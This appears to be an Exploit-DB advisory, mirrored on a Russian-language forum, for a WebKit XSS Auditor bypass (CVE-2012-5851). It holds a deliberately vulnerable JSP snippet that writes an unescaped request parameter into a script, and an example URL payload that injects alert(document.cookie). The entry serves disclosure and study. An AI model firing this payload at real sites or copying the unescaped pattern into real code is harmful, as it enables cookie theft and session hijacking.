- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38024
- Проверка EDB
-
- Пройдено
- Автор
- TUSHAR DALVI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2012-5851
- Дата публикации
- 2012-07-19
WebKit Cross-Site Scripting Filter - 'Cross-Site ScriptingAuditor.cpp' Security Bypass
Код:
source: https://www.securityfocus.com/bid/56570/info
WebKit is prone to a security-bypass vulnerability.
An attacker can exploit this vulnerability to bypass the cross-site scripting filter mechanism. Successful exploits may allow attackers to execute arbitrary script code and steal cookie-based authentication credentials.
Code in test.jsp:
<title>Test Page</title>
<script>
var foo = "<%= request.getParameter("foo") %>";
document.write("<text>Welcome "+ foo + "</text>");
</script>
Example URI:
http://www.domain.com/test.jsp?foo=2"; alert(document.cookie); var a="1
- Источник
- www.exploit-db.com